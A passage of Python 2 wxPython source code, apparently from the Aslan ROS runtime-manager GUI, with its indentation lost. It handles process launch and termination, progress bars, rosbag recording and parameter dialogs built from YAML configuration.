proc = psutil.Popen(args, stdin=subprocess.PIPE, stdout=out, stderr=err, shell=shell)
self.all_procs.append(proc)
if f == self.log_th:
thinf = th_start(f, {'file': proc.stdout, 'que': self.log_que_stdout})
self.all_th_infs.append(thinf)
thinf = th_start(f, {'file': proc.stderr, 'que': self.log_que_stderr})
self.all_th_infs.append(thinf)
elif f:
thinf = th_start(f, {'file': proc.stdout})
self.all_th_infs.append(thinf)
else:
flags = self.obj_to_gdic(obj, {}).get('flags', [])
if sigint is None:
sigint = 'SIGTERM' not in flags
if kill_children is None:
kill_children = 'kill_children' in flags
if kill_children:
terminate_children(proc, sigint)
terminate(proc, sigint)
enables_set(obj, 'proc_wait', False)
th_start(proc_wait_thread, {'proc': proc, 'obj': obj})
if proc in self.all_procs:
self.all_procs.remove(proc)
proc = None
return proc
def gdic_get_1st(self, dic):
gdic = dic.get('gui', {})
gdic['update_func'] = self.update_func
return gdic
def load_dic_pdic_setup(self, name, dic):
name = dic.get('share_val', dic.get('name', name))
pdic = self.load_dic.get(name, {})
self.load_dic[name] = pdic
return pdic
def get_var(self, prm, var_name, def_ret=None):
return next((var for var in prm.get('vars') if var.get('name') == var_name), def_ret)
def get_param(self, prm_name):
return next((prm for prm in self.params if prm['name'] == prm_name), None)
def add_cfg_info(self, cfg_obj, obj, name, pdic, gdic, run_disable, prm):
self.config_dic[cfg_obj] = {'obj': obj, 'name': name, 'pdic': pdic, 'gdic': gdic,
'run_disable': run_disable, 'param': prm}
def set_param_panel(self, obj, parent):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
panel = ParamPanel(parent, frame=self, pdic=pdic, gdic=gdic, prm=prm)
sizer_wrap((panel,), wx.VERTICAL, 0, wx.EXPAND, 0, parent)
k = 'ext_toggle_enables'
gdic[k] = gdic.get(k, []) + [panel]
def stdout_file_search(self, file, k):
s = ''
while True:
c = file.read(1)
if not c:
return None
if c != '\r' and c != '\n':
s += c
continue
s = s.strip()
if k in s:
break
s = ''
i = s.find(k) + len(k)
return s[i:]
def point_cloud_progress_bar(self, file, ev):
obj = self.button_pcd
(pdic, _, _) = self.obj_to_pdic_gdic_prm(obj)
n = len(pdic.get('pcd_file', '').split(','))
if n == 0:
return
i = 0
while not ev.wait(0):
s = self.stdout_file_search(file, 'load ')
if not s:
break
err_key = 'failed '
if s[:len(err_key)] != err_key:
i += 1
else:
i -= 1
print s
wx.CallAfter(self.label_point_cloud_bar.set, 100 * i / n)
wx.CallAfter(self.label_point_cloud_bar.clear)
def rosbag_play_progress_bar(self, file, ev):
while not ev.wait(0):
s = self.stdout_file_search(file, 'Duration:')
if not s:
break
lst = s.split()
pos = str_to_float(lst[0])
# lst[1] is '/'
total = str_to_float(lst[2])
if total == 0:
continue
prg = int(100 * pos / total + 0.5)
pos = str(int(pos))
total = str(int(total))
wx.CallAfter(self.label_rosbag_play_bar.set, prg)
wx.CallAfter(self.label_rosbag_play_bar.clear)
def load_yaml(filename, def_ret=None):
source_dir = src_dir()
path = source_dir + filename
if not os.path.isfile(path):
return def_ret
print('loading ' + filename)
f = open(source_dir + filename, 'r')
d = yaml.load(f)
f.close()
return d
def src_dir():
return os.path.abspath(os.path.dirname(__file__)) + "/"
def path_expand_cmd(path):
lst = path.split('/')
s = lst[0]
if s[:2] == '$(' and s[-1] == ')':
cmd = s[2:-1].split(' ')
lst[0] = subprocess.check_output(cmd).strip()
path = '/'.join(lst)
return path
def get_tooltip(dic):
return dic.get('desc')
def get_tooltips(dic):
return dic.get('descs', [])
def get_tooltip_obj(obj):
if getattr(obj, 'GetToolTip', None):
t = obj.GetToolTip()
return t.GetTip() if t else None
return None
def set_tooltip(obj, dic):
set_tooltip_str(obj, get_tooltip(dic))
def set_tooltips(obj, dic):
lst = get_tooltips(dic)
if lst and getattr(obj, 'SetItemToolTip', None):
for (ix, s) in enumerate(lst):
obj.SetItemToolTip(ix, s)
def set_tooltip_str(obj, s):
if s and getattr(obj, 'SetToolTipString', None):
obj.SetToolTipString(s)
def static_box_sizer(parent, s, orient=wx.VERTICAL):
sb = wx.StaticBox(parent, wx.ID_ANY, s)
sb.Lower()
return wx.StaticBoxSizer(sb, orient)
def wx_flag_get(flags):
dic = {'top': wx.TOP, 'bottom': wx.BOTTOM, 'left': wx.LEFT, 'right': wx.RIGHT,
'all': wx.ALL, 'expand': wx.EXPAND, 'fixed_minsize': wx.FIXED_MINSIZE,
'center_v': wx.ALIGN_CENTER_VERTICAL, 'center_h': wx.ALIGN_CENTER_HORIZONTAL,
'passwd': wx.TE_PASSWORD}
lst = [dic.get(f) for f in flags if f in dic]
return reduce(lambda a, b: a + b, [0] + lst)
def set_size_gdic(dlg, gdic={}):
(w, h) = dlg.GetSize()
if not gdic:
gdic = getattr(dlg, 'gdic', {})
nw = gdic.get('dialog_width', w)
nh = gdic.get('dialog_height', h)
if (w, h) != (nw, nh):
dlg.SetSize((nw, nh))
def obj_refresh(obj):
if type(obj) is CT.GenericTreeItem:
while obj.GetParent():
obj = obj.GetParent()
tree = obj.GetData()
tree.Refresh()
def enables_set(obj, k, en):
if hasattr(obj, 'enables_proxy'):
(obj, k) = obj.enables_proxy
d = attr_getset(obj, 'enabLes', {})
d[k] = en
d['last_key'] = k
if hasattr(obj, 'Enable'):
obj.Enable(all(d.values()))
obj_refresh(obj)
if isinstance(obj, wx.HyperlinkCtrl):
if not hasattr(obj, 'coLor'):
obj.coLor = {True: obj.GetNormalColour(), False: '#808080'}
c = obj.coLor.get(obj.IsEnabled())
obj.SetNormalColour(c)
obj.SetVisitedColour(c)
def append_tc_limit(tc, s, rm_chars=0):
if rm_chars > 0:
tc.Remove(0, rm_chars)
tc.AppendText(s)
def get_proc_children(proc, r=False):
try:
return proc.get_children(recursive=r)
except AttributeError:
return proc.children(recursive=r)
def terminate_children(proc, sigint=False):
for child in get_proc_children(proc):
terminate_children(child, sigint)
terminate(child, sigint)
def terminate(proc, sigint=False):
if sigint:
proc.send_signal(signal.SIGINT)
else:
proc.terminate()
def cut_esc(s):
while True:
i = s.find(chr(27))
if i < 0:
break
j = s.find('m', i)
if j < 0:
break
s = s[:i] + s[j + 1:]
return s
def proc_wait_thread(ev, proc, obj):
proc.wait()
wx.CallAfter(enables_set, obj, 'proc_wait', True)
th_end((None, ev))
def th_start(target, kwargs={}):
ev = threading.Event()
kwargs['ev'] = ev
th = threading.Thread(target=target, kwargs=kwargs)
th.daemon = True
th.start()
return (th, ev)
def th_end((th, ev)):
if not th:
th = threading.current_thread()
threading.Timer(1.0, th_end, ((th, ev),)).start()
return
ev.set()
th.join()
def que_clear(que):
with que.mutex:
que.queue.clear()
def set_path(tc, v):
tc.SetValue(v)
tc.SetInsertionPointEnd()
def set_val(obj, v):
func = getattr(obj, 'SetValue', getattr(obj, 'Check', None))
if func:
func(v)
obj_refresh(obj)
if type(obj) is wx.ToggleButton:
button_color_change(obj)
def file_dialog(parent, tc, path_inf_dic={}):
path = tc.GetValue()
path = get_top(path.split(','), path)
(dn, fn) = os.path.split(path)
path_type = path_inf_dic.get('path_type')
if path_type == 'dir':
fns = path_inf_dic.get('filenames')
if type(fns) is str and fns[-5:] == '.yaml':
fns = load_yaml(fns)
if type(fns) is not list:
fns = None
path_inf_dic['filenames'] = fns
dlg = wx.DirDialog(parent, defaultPath=path)
else:
st_dic = {'save': wx.FD_SAVE, 'multi': wx.FD_MULTIPLE}
dlg = wx.FileDialog(parent, defaultDir=dn, defaultFile=fn,
style=st_dic.get(path_type, wx.FD_DEFAULT_STYLE))
ret = show_modal(dlg)
if ret == wx.ID_OK:
path = ','.join(dlg.GetPaths()) if path_type == 'multi' else dlg.GetPath()
if path_type == 'dir' and fns:
path = ','.join([path + '/' + fn for fn in fns])
set_path(tc, path)
dlg.Destroy()
return ret
def button_color_change(btn, v=None):
if v is None and type(btn) is wx.ToggleButton:
v = btn.GetValue()
key = (v, btn.IsEnabled())
dic = {(True, True): ('#F9F9F8', '#8B8BB9'), (True, False): ('#F9F9F8', '#E0E0F0')}
(fcol, bcol) = dic.get(key, (wx.NullColour, wx.NullColour))
btn.SetForegroundColour(fcol)
btn.SetBackgroundColour(bcol)
def fix_link_color(obj):
t = type(obj)
if t is CT.GenericTreeItem or t is CT.CustomTreeCtrl:
obj.SetHyperTextVisitedColour(obj.GetHyperTextNewColour())
elif t is wx.HyperlinkCtrl:
obj.SetVisitedColour(obj.GetNormalColour())
def OnButtonColorHdr(event):
btn = event.GetEventObject()
dic = {wx.EVT_TOGGLEBUTTON.typeId: None,
wx.EVT_LEFT_DOWN.typeId: True,
wx.EVT_LEFT_UP.typeId: False}
v = dic.get(event.GetEventType(), '?')
if v != '?':
button_color_change(btn, v)
event.Skip()
btn_null_bgcol = None
def is_btn_null_bgcol(btn):
global btn_null_bgcol
bak = btn.GetBackgroundColour()
if btn_null_bgcol is None:
btn.SetBackgroundColour(wx.NullColour)
btn_null_bgcol = btn.GetBackgroundColour()
if bak != btn_null_bgcol:
btn.SetBackgroundColour(bak)
return bak == btn_null_bgcol
def button_color_hdr_setup(btn):
hdr = OnButtonColorHdr
if type(btn) is wx.ToggleButton:
btn.Bind(wx.EVT_TOGGLEBUTTON, hdr)
elif type(btn) is wx.Button and is_btn_null_bgcol(btn):
btn.Bind(wx.EVT_LEFT_DOWN, hdr)
btn.Bind(wx.EVT_LEFT_UP, hdr)
def buttons_color_hdr_setup(frm_obj):
key = 'button_'
btns = [getattr(frm_obj, nm) for nm in dir(frm_obj) if nm[:len(key)] == key]
for btn in btns:
button_color_hdr_setup(btn)
def show_modal(dlg):
buttons_color_hdr_setup(dlg)
return dlg.ShowModal()
def sizer_wrap(add_objs, orient=wx.VERTICAL, prop=0, flag=0, border=0, parent=None):
szr = wx.BoxSizer(orient)
for obj in add_objs:
szr.Add(obj, prop, flag, border)
if parent:
parent.SetSizer(szr)
return szr
def attr_getset(obj, name, def_ret):
if not hasattr(obj, name):
setattr(obj, name, def_ret)
return getattr(obj, name)
def get_top(lst, def_ret=None):
return lst[0] if len(lst) > 0 else def_ret
def enables_get(obj, k, def_ret=None):
return attr_getset(obj, 'enabLes', {}).get(k, def_ret)
def enables_get_last(obj):
k = enables_get(obj, 'last_key')
return k, enables_get(obj, k)
# dic_list util (push, pop, get)
def dic_list_push(dic, key, v):
dic_getset(dic, key, []).append(v)
def dic_list_pop(dic, key):
dic.get(key, [None]).pop()
def dic_list_get(dic, key, def_ret=None):
return dic.get(key, [def_ret])[-1]
def bak_stk_push(dic, key):
if key in dic:
k = key + '_bak_str'
dic_getset(dic, k, []).append(dic.get(key))
def bak_stk_pop(dic, key):
k = key + '_bak_str'
stk = dic.get(k, [])
if len(stk) > 0:
dic[key] = stk.pop()
else:
del dic[key]
def bak_stk_set(dic, key, v):
# bak_str_push(dic, key)
dic[key] = v
def lst_append_once(lst, v):
exist = v in lst
if not exist:
lst.append(v)
return exist
def lst_remove_once(lst, v):
exist = v in lst
if exist:
lst.remove(v)
return exist
def msg_path_to_obj_attr(msg, path):
lst = path.split('.')
obj = msg
for attr in lst[:-1]:
obj = getattr(obj, attr, None)
return obj, lst[-1]
def str_to_rosval(s, type_str, def_ret=None):
cvt_dic = {
'int8': int, 'int16': int, 'int32': int,
'uint8': int, 'uint16': int, 'uint32': int,
'int64': long, 'uint64': long,
'float32': float, 'float64': float,
}
t = cvt_dic.get(type_str)
s = s.replace(',', '.') if t is float and type(s) is str else s
return t(s) if t else def_ret
def adjust_num_str(s):
if '.' in s:
while s[-1] == '0':
s = s[:-1]
if s[-1] == '.':
s = s[:-1]
return s
def dic_getset(dic, key, def_ret):
if key not in dic:
dic[key] = def_ret
return dic.get(key)
def eval_if_str(self, v):
return eval(v) if type(v) is str else v
def dic_eval_if_str(self, dic, key, def_ret=None):
return eval_if_str(self, dic.get(key, def_ret))
def gdic_dialog_name_get(gdic):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
return gdic.get(dlg_type + '_dialog', gdic.get('dialog', 'MyDialogParam'))
def gdic_dialog_type_chk(gdic, name):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
tail = '_dialog_only'
lst = [(k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail]
only_chk = next((False for (k, type) in lst if type != dlg_type and name in gdic.get(k, [])), True)
tail = '_dialog_allow'
lst = [(k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail]
allow_chk = next((False for (k, type) in lst if type == dlg_type and name not in gdic.get(k, [])), True)
return only_chk and allow_chk
def str_to_float(s):
return float(s.replace(',', '.'))
class StrValObj:
def __init__(self, s, v):
self.s = s
self.v = v
def GetValue(self):
return self.v
def SetValue(self, v):
self.v = v
class MyApp(wx.App):
def OnInit(self):
wx.InitAllImageHandlers()
frame_1 = MyFrame(None, wx.ID_ANY, "")
self.SetTopWindow(frame_1)
# buttons_color_hdr_setup(frame_1)
frame_1.Show()
return 1
class MyDialogROSbagRecord(aslan_gui.MyDialogROSbagRecord):
def __init__(self, *args, **kwds):
self.cmd_dic = kwds.pop('cmd_dic')
aslan_gui.MyDialogROSbagRecord.__init__(self, *args, **kwds)
self.cbs = []
self.refresh()
self.parent = self.GetParent()
self.cmd_dic[self.button_start] = ('rosbag record', None)
self.toggles = [self.button_start, self.button_stop]
def OnRef(self, event):
tc = self.text_ctrl
file_dialog(self, tc, {'path_type': 'save'})
def OnStart(self, event):
key_obj = self.button_start
path = self.text_ctrl.GetValue()
if path == '':
print('path=""')
return
topic_opt = []
if self.cbs[0].GetValue(): # 'All'
topic_opt = ['-a']
else:
for obj in self.cbs:
if obj.GetValue():
topic_opt += [obj.GetLabel()]
if not topic_opt:
print('topic=[]')
return
args = topic_opt + ['-O', path]
split_arg = ['--split'] if self.checkbox_split.GetValue() else []
size_arg = self.size_arg_get()
if split_arg and not size_arg:
wx.MessageBox('size is required, with split')
return
args += split_arg + size_arg
(cmd, proc) = self.cmd_dic[key_obj]
proc = self.parent.launch_kill(True, cmd, proc, add_args=args, obj=key_obj, kill_children=True)
self.cmd_dic[key_obj] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
def OnStop(self, event):
key_obj = self.button_start
(cmd, proc) = self.cmd_dic[key_obj]
proc = self.parent.launch_kill(False, cmd, proc, sigint=True, obj=key_obj, kill_children=True)
self.cmd_dic[key_obj] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
self.Hide()
def OnRefresh(self, event):
self.refresh()
def refresh(self):
lst = ['all'] + subprocess.check_output(['rostopic', 'list']).strip().split('\n')
panel = self.panel_1
szr = self.sizer_topic
for obj in self.cbs:
szr.Remove(obj)
obj.Destroy()
self.cbs = []
for topic in lst:
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
bdr = 4 if topic == 'All' else 4 * 4
szr.Add(obj, 0, wx.LEFT, bdr)
self.cbs.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
def show(self):
self.Show()
self.update_filename()
def update_filename(self):
tc = self.text_ctrl
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'aslan-%04d%02d%02d%02d%02d%02d' % (
now.year, now.month, now.day, now.hour, now.minute, now.second)
path = os.path.join(dn, fn)
set_path(tc, path)
def size_arg_get(self):
tc = self.text_ctrl_size
s = tc.GetValue()
mb = 0
try:
mb = str_to_float(s)
except ValueError:
mb = 0
if mb <= 0:
tc.SetValue('')
return ['--size=' + str(int(mb * 1024 * 1024))] if mb > 0 else []
class ParamPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.frame = kwds.pop('frame')
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
wx.Panel.__init__(self, *args, **kwds)
self.gdic['param_panel'] = self
obj = self.frame.cfg_prm_to_obj({'pdic': self.pdic, 'gdic': self.gdic, 'param': self.prm})
(_, _, proc) = self.frame.obj_to_cmd_dic_cmd_proc(obj)
hszr = None
self.vps = []
self.tmp_msg = None
szr = wx.BoxSizer(wx.VERTICAL)
topic_szrs = (None, None)
vars = self.prm.get('vars')
if self.gdic.get('show_order'):
var_lst = lambda name, vars: [var for var in vars if var.get('name') == name]
vars = reduce(lambda lst, name: lst + var_lst(name, vars), self.gdic.get('show_order'), [])
for var in vars:
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
bak_stk_push(gdic_v, 'func')
if gdic_v.get('func'):
continue
v = self.pdic.get(name, var.get('v'))
vp = VarPanel(self, var=var, v=v, update=self.update)
vp.setup_tooltip()
self.vps.append(vp)
gdic_v['var'] = vp
gdic_v['func'] = vp.get_v
prop = gdic_v.get('prop', 0)
border = gdic_v.get('border', 0)
flag = wx_flag_get(gdic_v.get('flags', []))
do_category = 'no_category' not in gdic_v.get('flags', [])
if do_category and self.in_msg(var):
bak = (szr, hszr)
(szr, hszr) = topic_szrs
if szr is None:
szr = static_box_sizer(self, 'topic : ' + self.prm.get('topic'))
bak[0].Add(szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = szr
if vp.is_nl():
hszr = None if hszr else hszr
flag |= wx.EXPAND
else:
if hszr is None:
hszr = wx.BoxSizer(wx.HORIZONTAL)
szr.Add(hszr, 0, wx.EXPAND)
flag |= wx.ALIGN_CENTER_VERTICAL
targ_szr = hszr
if do_category and 'rosparam' in var:
rp_szr = static_box_sizer(self, var.get('rosparam'))
targ_szr.Add(rp_szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = rp_szr
user_category = gdic_v.get('user_category')
if user_category is not None and hszr:
user_szr = static_box_sizer(self, user_category, orient=wx.HORIZONTAL)
(flgs, bdr) = gdic_v.get('user_category_add', [[], 0])
targ_szr.Add(user_szr, 0, wx_flag_get(flgs), bdr)
targ_szr = hszr = user_szr
targ_szr.Add(vp, prop, flag, border)
if 'nl' in gdic_v.get('flags', []):
hszr = None
if do_category and self.in_msg(var):
topic_szrs = (szr, hszr)
(szr, hszr) = bak
if 'hline' in gdic_v.get('flags', []) and hszr is None:
szr.Add(wx.StaticLine(self, wx.ID_ANY), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, 4)
if not self.in_msg(var) and var.get('rosparam'):
k = 'ext_toggle_enables'
self.gdic[k] = self.gdic.get(k, []) + [vp]
enables_set(vp, 'toggle', proc is None)
if 'disable' in gdic_v.get('flags', []):
vp.Enable(False)
if 'hide' in gdic_v.get('flags', []):
vp.Hide()
self.SetSizer(szr)
if 'no_init_update' not in self.prm.get('flags', []):
self.update()
def get_gdic_v_and_chk_enable(self, var_name):
gdic_v = dic_getset(self.gdic, var_name, {})
if 'panel' in gdic_v and dic_eval_if_str(self.frame, gdic_v, 'panel') != self.GetParent():
return None
return gdic_v
def update(self, var=None):
update_func = self.gdic.get('update_func')
if update_func:
self.gdic['update_func_arg_var'] = var
update_func(self.pdic, self.gdic, self.prm)
def detach_func(self):
for var in self.prm.get('vars'):
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
if 'func' in gdic_v:
bak_stk_pop(gdic_v, 'func')
vp = gdic_v.get('var')
lst_remove_once(self.gdic.get('ext_toggle_enables', []), vp)
def in_msg(self, var):
if 'topic' not in self.prm or 'msg' not in self.prm:
return False
if self.tmp_msg is None:
klass_msg = globals().get(self.prm.get('msg'))
if klass_msg is None:
return False
self.tmp_msg = klass_msg()
(obj, attr) = msg_path_to_obj_attr(self.tmp_msg, var.get('name'))
return obj and attr in obj.__slots__
class VarPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.var = kwds.pop('var')
v = kwds.pop('v')
self.update = kwds.pop('update')
wx.Panel.__init__(self, *args, **kwds)
self.min = self.var.get('min')
self.max = self.var.get('max')
self.has_slider = self.min is not None and self.max is not None
self.lb = None
label = self.var.get('label', '')
self.kind = self.var.get('kind')
if self.kind == 'radio_box':
choices = self.var.get('choices', [])
style = wx.RA_SPECIFY_COLS if self.var.get('choices_style') == 'h' else wx.RA_SPECIFY_ROWS
self.obj = wx.RadioBox(self, wx.ID_ANY, label, choices=choices, majorDimension=0, style=style)
self.choices_sel_set(v)
self.Bind(wx.EVT_RADIOBOX, self.OnUpdate, self.obj)
return
if self.kind == 'menu':
choices = self.var.get('choices', [])
self.obj = wx.Choice(self, wx.ID_ANY, choices=choices)
self.choices_sel_set(v)
self.Bind(wx.EVT_CHOICE, self.OnUpdate, self.obj)
if label:
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
sizer_wrap((self.lb, self.obj), wx.HORIZONTAL, 0, flag, 4, self)
return
if self.kind == 'checkbox':
self.obj = wx.CheckBox(self, wx.ID_ANY, label)
self.obj.SetValue(v)
self.Bind(wx.EVT_CHECKBOX, self.OnUpdate, self.obj)
return
if self.kind == 'checkboxes':
item_n = dic_eval_if_str(self, self.var, 'item_n', 1)
self.obj = Checkboxes(self, item_n, label)
self.obj.set(v)
for box in self.obj.boxes:
self.obj.Bind(wx.EVT_CHECKBOX, self.OnUpdate, box)
return
if self.kind == 'toggle_button':
self.obj = wx.ToggleButton(self, wx.ID_ANY, label)
set_val(self.obj, v)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnUpdate, self.obj)
button_color_hdr_setup(self.obj)
return
if self.kind == 'hide':
self.Hide()
return
if self.kind == 'topic':
topic_type = self.var.get('topic_type')
topics = self._get_topics_by_type(topic_type)
self.obj = wx.ComboBox(self, id=wx.ID_ANY, value=v, choices=topics, style=wx.CB_DROPDOWN, size=(130, -1))
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
sizer_wrap((self.lb, self.obj), wx.HORIZONTAL, 0, flag, 4, self)
return
szr = wx.BoxSizer(wx.HORIZONTAL)
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
szr.Add(self.lb, 0, flag, 4)
if self.kind == 'path':
v = str(v)
v = path_expand_cmd(v)
v = os.path.expandvars(os.path.expanduser(v))
style = wx.TE_PROCESS_ENTER + wx_flag_get(self.var.get('str_flags', []))
self.tc = wx.TextCtrl(self, wx.ID_ANY, str(v), style=style, size=(130, -1))
self.Bind(wx.EVT_TEXT_ENTER, self.OnUpdate, self.tc)
if self.kind in ('num', None):
if self.has_slider:
self.w = self.max - self.min
vlst = [v, self.min, self.max, self.var['v']]
self.is_float = len([v_ for v_ in vlst if type(v_) is not int]) > 0
self.int_max = 1000 if self.is_float else self.max
self.int_min = 0 if self.is_float else self.min
self.slider = wx.Slider(self, wx.ID_ANY, self.get_int_v(), self.int_min, self.int_max)
self.Bind(wx.EVT_COMMAND_SCROLL, self.OnScroll, self.slider)
self.slider.SetMinSize((82, 27))
szr.Add(self.slider, 1, wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, 4)
else:
self.is_float = type(self.var['v']) is not int
self.tc.SetMinSize((40, 27))
flag = wx.ALIGN_CENTER_VERTICAL
prop = 1 if self.kind == 'path' or self.kind == 'str' else 0
szr.Add(self.tc, prop, flag, 4)
if self.kind == 'path':
self.ref = wx.Button(self, wx.ID_ANY, 'File')
self.Bind(wx.EVT_BUTTON, self.OnRef, self.ref)
button_color_hdr_setup(self.ref)
self.ref.SetMinSize((40, 29))
szr.Add(self.ref, 0, flag, 4)
if self.has_slider or self.kind == 'num':
vszr = wx.BoxSizer(wx.VERTICAL)
szr.Add(vszr, 0, wx.ALIGN_CENTER_VERTICAL)
self.SetSizer(szr)
def _get_topics_by_type(self, message_type):
# get list of current available topics:
ros_topics = rospy.get_published_topics()
matched_topics = list(filter(lambda x: x[1] == message_type, ros_topics))
topic_names = [x[0] for x in matched_topics]
topic_names.sort()
return topic_names
def setup_tooltip(self):
if get_tooltips(self.var):
set_tooltips(self.obj, self.var)
if get_tooltip(self.var):
obj = self.lb if self.lb else (self if self.kind == 'radio_box' else self.obj)
set_tooltip(obj, self.var)
def get_v(self):
if self.kind in ['radio_box', 'menu']:
return self.choices_sel_get()
if self.kind in ['checkbox', 'toggle_button', 'topic']:
return self.obj.GetValue()
if self.kind == 'checkboxes':
return self.obj.get()
if self.kind == 'hide':
return self.var.get('v')
if self.kind in ['path', 'str']:
return str(self.tc.GetValue())
if not self.has_slider and self.tc.GetValue() == '':
return ''
return self.get_tc_v()
def get_tc_v(self):
s = self.tc.GetValue()
v = str_to_float(s) if self.is_float else int(s)
if self.has_slider:
v = self.min if v < self.min else v
v = self.max if v > self.max else v
self.tc.SetValue(adjust_num_str(str(v)))
return v
def get_int_v(self):
v = self.get_tc_v()
if self.is_float:
v = int(self.int_max * (v - self.min) / self.w if self.w != 0 else 0)
return v
def OnScroll(self, event):
iv = self.slider.GetValue()
s = str(iv)
if self.is_float:
v = self.min + float(self.w) * iv / self.int_max
s = str(Decimal(v).quantize(Decimal(str(self.get_step()))))
self.tc.SetValue(s)
self.update(self.var)
def get_step(self):
step = self.var.get('step')
return step if step else 0.01 if self.is_float else 1
def OnUpdate(self, event):
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnRef(self, event):
if file_dialog(self, self.tc, self.var) == wx.ID_OK:
self.update(self.var)
def choices_sel_get(self):
return self.obj.GetStringSelection() if self.var.get('choices_type') == 'str' else self.obj.GetSelection()
def choices_sel_set(self, v):
if self.var.get('choices_type') == 'str':
self.obj.SetStringSelection(v)
else:
self.obj.SetSelection(v)
def is_nl(self):
return self.has_slider or self.kind in ['path']
class MyDialogParam(aslan_gui.MyDialogParam):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
aslan_gui.MyDialogParam.__init__(self, *args, **kwds)
set_size_gdic(self, gdic)
self.Bind(wx.EVT_CLOSE, self.OnClose)
ok_lb_key = 'open_dialog_ok_label'
if dic_list_get(gdic, 'dialog_type', 'config') == 'open' and ok_lb_key in gdic:
self.button_1.SetLabel(gdic.get(ok_lb_key))
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w, h) = self.GetSize()
(w2, _) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2, h))
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class BarLabel(wx.Panel):
def __init__(self, parent, txt='', pos=wx.DefaultPosition, size=wx.DefaultSize, style=0, hv=wx.HORIZONTAL,
show_lb=True):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lb = wx.StaticText(self, wx.ID_ANY, '', style=style)
self.txt = txt
self.hv = hv
self.dir = wx.SOUTH if hv == wx.HORIZONTAL else wx.EAST
self.show_lb = show_lb
self.prg = -1
self.dflt_col1 = wx.Colour(250, 250, 250)
self.dflt_col2 = wx.Colour(128, 128, 128)
self.col1 = self.dflt_col1
self.col2 = self.dflt_col2
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, prg):
self.prg = prg
if self.show_lb:
self.lb.SetLabel(self.txt + str(prg) + '%' if prg >= 0 else '')
self.Refresh()
def set_col(self, col1, col2):
self.col1 = col1 if col1 != wx.NullColour else self.dflt_col1
self.col2 = col2 if col2 != wx.NullColour else self.dflt_col2
def clear(self):
self.set(-1)
def OnPaint(self, event):
dc = wx.PaintDC(self)
(w, h) = self.GetSize()
h = 15
if self.IsEnabled():
p = (w if self.hv == wx.HORIZONTAL else h) * self.prg / 100
rect = wx.Rect(0, 0, p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, h - p, w, p)
dc.GradientFillLinear(rect, self.col1, self.col2, self.dir)
rect = wx.Rect(p, 0, w - p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, 0, w, h - p)
dc.GradientFillLinear(rect, wx.Colour(200, 200, 200), wx.Colour(250, 250, 250), self.dir)
else:
rect = wx.Rect(0, 0, w, h)
dc.GradientFillLinear(rect, wx.Colour(250, 250, 250), wx.Colour(250, 250, 250), self.dir)
class Checkboxes(wx.Panel):
def __init__(self, parent, item_n, lb):
wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize)
self.boxes = [wx.CheckBox(self, wx.ID_ANY, lb + str(i)) for i in range(item_n)]
vsz = wx.BoxSizer(wx.VERTICAL)
for j in range((item_n + 7) / 8):
hsz = wx.BoxSizer(wx.HORIZONTAL)
for i in range(8):
idx = j * 8 + i
if idx < len(self.boxes):
hsz.Add(self.boxes[idx], 0, wx.LEFT, 8)
vsz.Add(hsz)
self.SetSizer(vsz)
vsz.Fit(self)
def set(self, vs):
vs = vs if vs else [True for box in self.boxes]
for (box, v) in zip(self.boxes, vs):
box.SetValue(v)
def get(self):
return [box.GetValue() for box in self.boxes]
class MyDialogNDTMapping(aslan_gui.MyDialogNDTMapping):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.pdic_bak = self.pdic.copy()
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
aslan_gui.MyDialogNDTMapping.__init__(self, *args, **kwds)
set_size_gdic(self)
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=self.pdic, gdic=self.gdic, prm=self.prm)
